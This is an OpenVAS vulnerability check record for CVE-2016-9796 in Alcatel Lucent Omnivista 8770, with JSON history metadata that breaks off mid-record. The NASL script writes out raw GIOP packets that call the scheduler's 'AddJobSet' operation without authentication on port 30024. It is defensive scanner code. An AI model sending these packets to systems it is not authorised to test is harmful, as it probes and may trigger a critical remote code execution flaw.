ID OPENVAS:1361412562310107112
Type openvas
Reporter Copyright (C) 2016 Greenbone Networks GmbH
Modified 2018-11-21T00:00:00
Description
This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_alcatel_luc_omnvista-rce-win.nasl 12465 2018-11-21 13:24:34Z cfischer $
#
# Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)
#
# Authors:
# Tameem Eissa <tameem.eissa@greenbone.net>
#
# Copyright:
# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
# CPE of the product this check targets; the main body below uses it to look up
# the port and version that the detection script recorded in the KB.
CPE = "cpe:/a:alcatel-lucent:omnivista";
# Registration phase: when the scanner loads the script with `description` set,
# only the metadata below is registered and the script exits before any network
# traffic is generated. The actual check follows this block.
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.107112");
script_version("$Revision: 12465 $");
script_cve_id("CVE-2016-9796");
# CVSS v2 base score and vector (network, low complexity, no auth, full C/I/A).
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"last_modification", value:"$Date: 2018-11-21 14:24:34 +0100 (Wed, 21 Nov 2018) $");
script_tag(name:"creation_date", value:"2016-12-23 13:00:46 +0530 (Fri, 23 Dec 2016)");
script_name("Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)");
# NOTE(review): the main body sends an unauthenticated GIOP request whose
# operation bytes spell "AddJobSet" to the scheduler listener; confirm that
# ACT_GATHER_INFO is the intended category for a check of that kind.
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2016 Greenbone Networks GmbH");
script_family("General");
# The detection script must run first so the CPE/version lookups in the main
# body succeed; os_detection.nasl presumably provides the Host/runs_windows key.
script_dependencies("gb_alcatel_luc_omnvista_detect.nasl", "os_detection.nasl");
# 30024 is the fixed GIOP/CORBA port the main body connects to; Services/www
# and 80 are where the product itself is detected.
script_require_ports("Services/www", 80, 30024);
# Both KB keys must be present or the scanner skips this script entirely; the
# second key restricts this variant of the check to Windows hosts.
script_mandatory_keys("alc-luc-omnvista/installed", "Host/runs_windows");
# Public references: original write-up and the published advisory entry.
script_xref(name:"URL", value:"http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html");
script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/40862/");
script_tag(name:"summary", value:"This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.");
# vuldetect describes the method used in the main body: one GIOP request on
# port 30024, then a regex match on the (filtered) response.
script_tag(name:"vuldetect", value:"Send a crafted giop packet request and check the response.");
script_tag(name:"insight", value:"The flaw is due to the fact that determined ORBs are exposed and they can be invoked without authentication.");
script_tag(name:"impact", value:"Successful exploitation will allow
remote attackers to execute arbitrary code.");
script_tag(name:"affected", value:"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0.");
# No vendor patch is referenced; the only mitigation given is network-level
# restriction of access to the Omnivista server (hence solution_type Workaround).
script_tag(name:"solution", value:"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue,
which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.");
# Quality-of-detection type: the result is based on an actual remote response,
# not on a version string alone.
script_tag(name:"qod_type", value:"remote_vul");
script_tag(name:"solution_type", value:"Workaround");
# Registration done; hand control back to the scanner.
exit(0);
}
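include("host_details.inc");

# Return only the bytes of `buf` whose value is >= 61 (0x3d, '='), dropping the
# length/padding bytes of a GIOP response so that the identifier strings in it
# can be matched with a plain regex. This is the filtering the original check
# performed inline, once per response; it is a pure function of `buf`.
#
# buf: raw response bytes as returned by recv().
# Returns the filtered bytes as a string ("" for an empty input).
function strip_low_bytes( buf ) {
  local_var buf, out, n, i;

  # Initialised explicitly so openvas-nasl-lint sees a defined variable.
  out = "";
  n = strlen( buf );
  for( i = 0; i < n; i++ ) {
    if( ord( buf[i] ) >= 61 ) {
      out += buf[i];
    }
  }
  return out;
}

# Main body: only reached when the scanner runs the script outside the
# description phase. Exit codes follow the usual convention: 0 = check not
# applicable / inconclusive, 99 = ran to completion and found nothing.
if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
if( ! ver = get_app_version( cpe:CPE, port:port ) ) exit( 0 );
# Only the 8770 product line is covered by this check.
if( ver != "8770" ) exit( 0 );

# The CORBA/GIOP listener lives on a fixed port, independent of the web port
# the detection script found the product on.
giopport = 30024;
if( ! get_port_state( giopport ) ) exit( 0 );

soc = open_sock_tcp( giopport );
if( ! soc ) exit( 0 );

# First GIOP 1.0 Request. The operation/interface bytes in it spell
# "SchedulerInterface" and "AddJobSet"; the remaining layout is taken
# unchanged from the original check.
req = raw_string( 0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x01, 0x26, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x13, 0x53, 0x63, 0x68, 0x65,
                  0x64, 0x75, 0x6c, 0x65, 0x72, 0x49, 0x6e, 0x74,
                  0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x0a, 0x41, 0x64, 0x64, 0x4a,
                  0x6f, 0x62, 0x53, 0x65, 0x74, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,
                  0x4d, 0x59, 0x4a, 0x4f, 0x42, 0x30, 0x31, 0x00,
                  0x00, 0x00, 0x07, 0xe0, 0x00, 0x00, 0x00, 0x06,
                  0x00, 0x00, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x10,
                  0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x08, 0x31, 0x31, 0x31, 0x31,
                  0x31, 0x31, 0x31, 0x00, 0x01, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
                  0x00, 0x00, 0x00, 0x3f, 0x75, 0x69, 0x64, 0x3d,
                  0x78, 0x78, 0x78, 0x2e, 0x79, 0x2e, 0x7a, 0x7a,
                  0x7a, 0x7a, 0x7a, 0x2c, 0x63, 0x6e, 0x3d, 0x41,
                  0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72,
                  0x61, 0x74, 0x6f, 0x72, 0x73, 0x2c, 0x63, 0x6e,
                  0x3d, 0x38, 0x37, 0x37, 0x30, 0x20, 0x61, 0x64,
                  0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61,
                  0x74, 0x69, 0x6f, 0x6e, 0x2c, 0x6f, 0x3d, 0x6e,
                  0x6d, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a,
                  0x6f, 0x6d, 0x6e, 0x69, 0x76, 0x69, 0x73, 0x62,
                  0x62, 0x00 );

send( socket:soc, data:req );
# Fixed wait for the ORB to answer; a single recv() of up to 4 KiB follows.
sleep( 5 );
res = recv( socket:soc, length:4096 );
if( ! strlen( res ) ) {
  # Close on every exit path, not only on the final one as before.
  close( soc );
  exit( 0 );
}

# The pattern below is made of identifiers the reference check expects in the
# scheduler's reply (IDL/scheduler/alcatel/JobSet/OMNIVISTA). No match means
# the ORB did not answer the unauthenticated call in the vulnerable way.
if( strip_low_bytes( buf:res ) !~ "GIOP.IDLschedulerutilnmdalcatelcomSCHEDJobSetOMNIVISTAOMNIVISTAHuQ" ) {
  close( soc );
  exit( 0 );
}

# Second GIOP 1.0 Request; the operation bytes spell "Active".
# NOTE(review): the hex values are wrapped in a string literal, so raw_string()
# receives the ASCII text "0x47, 0x49, ..." rather than these bytes. All
# published editions of this check carry the same quoting and match the reply
# against "GIOPGIOP" below, so it is left as-is here; whether the quotes were
# intended has to be confirmed against a real target before changing it.
req2 = raw_string("0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,
0xef, 0x0e, 0x5d, 0x58, 0x98, 0xf8, 0x0a, 0x00,
0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07,
0x41, 0x63, 0x74, 0x69, 0x76, 0x65, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00");

send( socket:soc, data:req2 );
sleep( 5 );
res = recv( socket:soc, length:4096 );
# The socket is no longer needed whatever the outcome of the match below.
close( soc );
if( ! strlen( res ) ) exit( 0 );

# Two GIOP magics in the filtered reply is the reference check's indicator
# that the scheduler processed both unauthenticated requests.
if( strip_low_bytes( buf:res ) =~ "GIOPGIOP" ) {
  security_message( port:giopport );
  exit( 0 );
}

exit( 99 );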
{"id": "OPENVAS:1361412562310107112", "bulletinFamily": "scanner", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)", "description": "This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.", "published": "2016-12-23T00:00:00", "modified": "2018-11-21T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107112", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html", "https://www.exploit-db.com/exploits/40862/"], "cvelist": ["CVE-2016-9796"], "type": "openvas", "lastseen": "2019-05-29T18:35:33", "history": [{"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-9796"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.", "edition": 7, "enchantments": {"dependencies": {"modified": "2018-11-22T11:08:26", "references": [{"idList": ["1337DAY-ID-26467"], "type": "zdt"}, {"idList": ["CVE-2016-9796"], "type": "cve"}, {"idList": ["EDB-ID:40862"], "type": "exploitdb"}, {"idList": ["PACKETSTORM:140026"], "type": "packetstorm"}, {"idList": ["SSV:92563"], "type": "seebug"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "ee3fee4bd62c0c4116cb61de892bc3f071c42d19275679194bd89da4b6693301", "hashmap": [{"hash": "fb634a5017b2a41a91c85626dded43f9", "key": "published"}, {"hash": "70cca94720f62109b82fe3d873b630b1", "key": "description"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "093f6fa86e4b143448c139412887dda8", "key": "cvelist"}, {"hash": "35b06cdf6e7f1387d88e10ea205c0816", "key": "title"}, {"hash": 
"47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "18f7ae8aaceb897d726f1bf00abd32b1", "key": "pluginID"}, {"hash": "9b0c8a560ca98109588056dc2f5375b9", "key": "references"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "0622425b32c3b455561de901e639f001", "key": "sourceData"}, {"hash": "cc48873685a1db65f44dc4a65ac3d77f", "key": "href"}, {"hash": "b709b30efc224af0ca142422dbaffff3", "key": "modified"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107112", "id": "OPENVAS:1361412562310107112", "lastseen": "2018-11-22T11:08:26", "modified": "2018-11-21T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310107112", "published": "2016-12-23T00:00:00", "references": ["http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html", "https://www.exploit-db.com/exploits/40862/"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_alcatel_luc_omnvista-rce-win.nasl 12465 2018-11-21 13:24:34Z cfischer $\n#\n# Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:alcatel-lucent:omnivista\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107112\");\n script_version(\"$Revision: 12465 $\");\n script_cve_id(\"CVE-2016-9796\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-21 14:24:34 +0100 (Wed, 21 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 13:00:46 +0530 (Fri, 23 Dec 2016)\");\n script_name(\"Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_alcatel_luc_omnvista_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80, 30024);\n script_mandatory_keys(\"alc-luc-omnvista/installed\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/40862/\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Alcatel Lucent Omnivista 8770 and is prone to a remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted giop packet request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the fact that determined ORBs are exposed and they can be invoked without authentication.\");\n\n script_tag(name:\"impact\", 
value:\"Successful exploitation will allow\n remote attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0.\");\n\n script_tag(name:\"solution\", value:\"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue,\n which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! ver = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\nif( ver != \"8770\" ) exit ( 0 );\n\ngiopport = 30024;\n\nif( ! get_port_state( giopport ) ) exit( 0 );\nsoc = open_sock_tcp( giopport );\nif( ! soc ) exit( 0 );\n\nreq = raw_string( 0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x01, 0x26, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x13, 0x53, 0x63, 0x68, 0x65,\n0x64, 0x75, 0x6c, 0x65, 0x72, 0x49, 0x6e, 0x74,\n0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x0a, 0x41, 0x64, 0x64, 0x4a,\n0x6f, 0x62, 0x53, 0x65, 0x74, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,\n0x4d, 0x59, 0x4a, 0x4f, 0x42, 0x30, 0x31, 0x00,\n0x00, 0x00, 0x07, 0xe0, 0x00, 0x00, 0x00, 0x06,\n0x00, 0x00, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x10,\n0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x08, 0x31, 0x31, 0x31, 0x31,\n0x31, 0x31, 0x31, 0x00, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x3f, 0x75, 0x69, 0x64, 0x3d,\n0x78, 0x78, 0x78, 0x2e, 0x79, 0x2e, 0x7a, 0x7a,\n0x7a, 0x7a, 0x7a, 0x2c, 0x63, 0x6e, 0x3d, 0x41,\n0x64, 0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72,\n0x61, 0x74, 0x6f, 0x72, 0x73, 0x2c, 0x63, 0x6e,\n0x3d, 0x38, 0x37, 0x37, 0x30, 0x20, 0x61, 0x64,\n0x6d, 0x69, 0x6e, 0x69, 0x73, 0x74, 0x72, 0x61,\n0x74, 0x69, 0x6f, 0x6e, 0x2c, 0x6f, 0x3d, 0x6e,\n0x6d, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0a,\n0x6f, 0x6d, 0x6e, 0x69, 0x76, 0x69, 0x73, 0x62,\n0x62, 0x00);\n\nsend( socket:soc, data:req );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! len ) exit( 0 );\n\ndata = \"\"; # nb: To make openvas-nasl-lint happy...\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data += res[i];\n }\n}\n\nif( data !~ \"GIOP.IDLschedulerutilnmdalcatelcomSCHEDJobSetOMNIVISTAOMNIVISTAHuQ\") exit ( 0 );\n\nreq2 = raw_string(\"0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x31, 0x00, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x02, 0x01, 0x00, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,\n0xef, 0x0e, 0x5d, 0x58, 0x98, 0xf8, 0x0a, 0x00,\n0x0c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07,\n0x41, 0x63, 0x74, 0x69, 0x76, 0x65, 0x00, 0x00,\n0x00, 0x00, 0x00, 0x00, 0x00\");\n\nsend( socket:soc, data:req2 );\nsleep( 5 );\nres = recv( socket:soc, length:4096 );\nlen = strlen( res );\nif( ! 
len ) exit( 0 );\ndata = \"\";\nfor( i = 0; i < len; i = i + 1 ) {\n if( ( ord( res[i] ) >= 61 ) ) {\n data += res[i];\n }\n}\n\nclose( soc );\nif( data =~ \"GIOPGIOP\") {\n security_message( port:giopport);\n exit( 0 );\n}\n\nexit( 99 );", "title": "Alcatel Lucent Omnivista 8770 - Remote Code Execution Vulnerability (Windows)", "type": "openvas", "viewCount": 8}, "differentElements": ["cvss"], "edition": 7, "lastseen": "2018-11-22T11:08:26"}, {"bulletin": {"bulletinFamily": "scanner", "cvelist": ["CVE-2016-9796"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "This host is installed with Alcatel Lucent Omnivista 8770 and is prone to Remote Command Execution vulnerability.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ecf5e257c8c02e87bf69f1acbd41f5f847fa3ced5d78d1c53d53993dec809ffc", "hashmap": [{"hash": "fb634a5017b2a41a91c85626dded43f9", "key": "published"}, {"hash": "c5bb34af05c207ad0795b24b339835fb", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "0db377921f4ce762c62526131097968f", "key": "naslFamily"}, {"hash": "c508dc802497bde903638e926fa16647", "key": "sourceData"}, {"hash": "093f6fa86e4b143448c139412887dda8", "key": "cvelist"}, {"hash": "eecca42a8be8bed371b48a635243e1fc", "key": "title"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "18f7ae8aaceb897d726f1bf00abd32b1", "key": "pluginID"}, {"hash": "9b0c8a560ca98109588056dc2f5375b9", "key": "references"}, {"hash": "414ffb7a9ac291dfddc8cd6cac0b9b19", "key": "description"}, {"hash": "ea106ff9c2727a6e906e8959871e7c06", "key": "reporter"}, {"hash": "cc48873685a1db65f44dc4a65ac3d77f", "key": "href"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107112", "id": "OPENVAS:1361412562310107112", "lastseen": "2017-10-25T14:42:56", "modified": 
"2017-10-24T00:00:00", "naslFamily": "General", "objectVersion": "1.3", "pluginID": "1361412562310107112", "published": "2016-12-23T00:00:00", "references": ["http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html", "https://www.exploit-db.com/exploits/40862/"], "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_alcatel_luc_omnvista-rce-win.nasl 7545 2017-10-24 11:45:30Z cfischer $\n#\n# Alcatel Lucent Omnivista 8770 - Remote Code Execution (windows)\n#\n# Authors:\n# Tameem Eissa <tameem.eissa@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:alcatel-lucent:omnivista\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107112\");\n script_version(\"$Revision: 7545 $\");\n script_cve_id(\"CVE-2016-9796\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-24 13:45:30 +0200 (Tue, 24 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-23 13:00:46 +0530 (Fri, 23 Dec 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_name(\"Alcatel Lucent Omnivista 8770 - Remote Code Execution (windows)\");\n\n script_tag(name: \"summary\" , value:\"This host is installed with Alcatel Lucent Omnivista 8770 and is prone to Remote Command Execution vulnerability.\");\n\n script_tag(name: \"vuldetect\" , value:\"Send a crafted giop packet request and check the response\");\n\n script_tag(name: \"insight\", value:\"The flaw is due to the fact that determined ORBs are exposed and they can be invoked without authentication.\");\n\n script_tag(name: \"impact\" , value:\"Successful exploitation will allow\n remote attackers to execute arbitrary code.\n\n Impact Level: Application\");\n\n script_tag(name: \"affected\" , value:\"Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0\");\n\n script_tag(name: \"solution\" , value:\"The vendor position is to refer to the technical guidelines of the product security deployment to mitigate this issue, which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.\");\n\n 
script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_xref(name : \"URL\" , value : \"http://blog.malerisch.net/2016/12/alcatel-omnivista-8770-unauth-rce-giop-corba.html\");\n script_xref(name : \"URL\" , value : \"https://www.exploit-db.com/exploits/40862/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_alcatel_luc_omnvista_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80, 30024);\n script_mandatory_keys(\"alc-luc-omnvista/installed\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif ( ! Ver = get_app_version( cpe:CPE, port: port)) exit( 0 );\nif ( Ver != \"8770\" ) exit ( 0 );\ngiopport = 30024;\nif( ! get_port_state( giopport ) ) exit( 0 );\nsoc = open_sock_tcp( giopport );\nif( ! soc ) exit( 0 );\n## Construct AddjobSet packet\nreq = raw_string( 0x47, 0x49, 0x4f, 0x50, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x01, 0x26, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x13, 0x53, 0x63, 0x68, 0x65, \n0x64, 0x75, 0x6c, 0x65, 0x72, 0x49, 0x6e, 0x74, \n0x65, 0x72, 0x66, 0x61, 0x63, 0x65, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x0a, 0x41, 0x64, 0x64, 0x4a, \n0x6f, 0x62, 0x53, 0x65, 0x74, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, \n0x4d, 0x59, 0x4a, 0x4f, 0x42, 0x30, 0x31, 0x00, \n0x00, 0x00, 0x07, 0xe0, 0x00, 0x00, 0x00, 0x06, \n0x00, 0x00, 0x00, 0x1b, 0x00, 0x00, 0x00, 0x10, \n0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x2a, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, \n0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
